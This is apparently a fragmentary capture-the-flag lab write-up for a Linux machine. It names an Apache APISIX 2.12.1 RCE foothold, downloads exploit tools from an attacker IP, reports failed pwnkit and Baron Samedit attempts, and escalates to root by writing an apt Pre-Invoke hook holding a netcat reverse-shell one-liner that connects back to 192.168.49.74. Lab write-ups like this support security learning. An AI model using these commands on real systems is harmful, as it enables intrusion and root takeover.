NETWORK
ENUMERATION
FOOTHOLD
Apache APISIX 2.12.1 - Remote Code Execution (RCE)
PRIV ESCALATION
Exploit Suggester
4e6a9299b35eabd3ae08b2859ba8a8b4
using linux-exploit-suggester, we can see that we can add a user to the system
wget http://192.168.49.74/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
bash linux-exploit-suggester.sh | tee -a linux-exploit-suggester
Thanks to linux-exploit-suggester, we have found potential exploit
pwnkit (CVE-2021-4034)
pwnkit: Local Privilege Escalation in polkit’s pkexec (CVE-2021-4034) .
Let’s use https://github.com/arthepsy/CVE-2021-4034
wget http://192.168.49.74/cve-2021-4034-poc.c
chmod +x cve-2021-4034-poc.c
Running the script
but unfortunately, we weren’t lucky with this exploit
The sudo Baron Samedit CVE-2021-3156 exploit also didn’t yield abything exploitable for us
Exploiting package manager
Looking into the crontab, we have found something interesting
As the service runs as root
we can execute malicious commands via the apt package manager
.
Let’s start by checking the writable permissions on /etc/apt/apt.conf.d
:
ls -ld /etc/apt/apt.conf.d
Now we insert a bash
reverse shell payload inside apt.conf.d
:
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.74 1234 >/tmp/f"};' > /etc/apt/apt.conf.d/shell
Next, we start our listener on our attack machine to then get a reverse shell as root.